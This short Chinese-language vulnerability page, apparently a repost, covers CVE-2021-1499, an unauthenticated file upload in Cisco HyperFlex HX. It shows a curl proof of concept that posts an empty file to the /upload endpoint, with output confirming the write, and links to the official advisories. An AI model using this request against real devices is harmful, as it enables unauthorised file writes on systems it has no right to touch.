Cisco HyperFlex HX 任意文件上传（CVE-2021-1499）-棉花糖会员站

# Cisco HyperFlex HX 任意文件上传（CVE-2021-1499）

Cisco HyperFlex HX数据平台基于Web的管理界面中的漏洞可能允许未经身份验证的远程攻击者将文件上传到受影响的设备。

“`
wvu@kharak:~$ curl -v http://192.168.123.133/upload -F x=@/dev/null
* Trying 192.168.123.133…
* TCP_NODELAY set
* Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)
> POST /upload HTTP/1.1
> Host: 192.168.123.133
> User-Agent: curl/7.64.1
> Accept: */*
> Transfer-Encoding: chunked
> Content-Type: multipart/form-data; boundary=————————1b9a7fe625152b78
> Expect: 100-continue
>
< HTTP/1.1 100 Continue * Signaling end of chunked upload via terminating chunk. < HTTP/1.1 200 OK < Server: nginx/1.8.1 < Date: Tue, 18 May 2021 01:10:59 GMT < Content-Type: application/json;charset=ISO-8859-1 < Content-Length: 56 < Connection: keep-alive < Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-NqIRKoqKg0DGa/4ZvALvdLDeCWjHxRJAGWG9bR7oqhg='; img-src 'self'; style-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; font-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; frame-src 'self'; frame-ancestors 'self'; object-src 'none'; connect-src 'self' < X-Content-Type-Options: nosniff < X-XSS-Protection: 1; mode=block < {"result": "filename: /var/www/localhost/images//null"} * Connection #0 to host 192.168.123.133 left intact * Closing connection 0 wvu@kharak:~$ ``` ref: * https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz * https://attackerkb.com/topics/Z2MeUsvSlT/cve-2021-1499 * https://nvd.nist.gov/vuln/detail/CVE-2021-1499

文章版权归作者所有，未经允许请勿转载。

THE END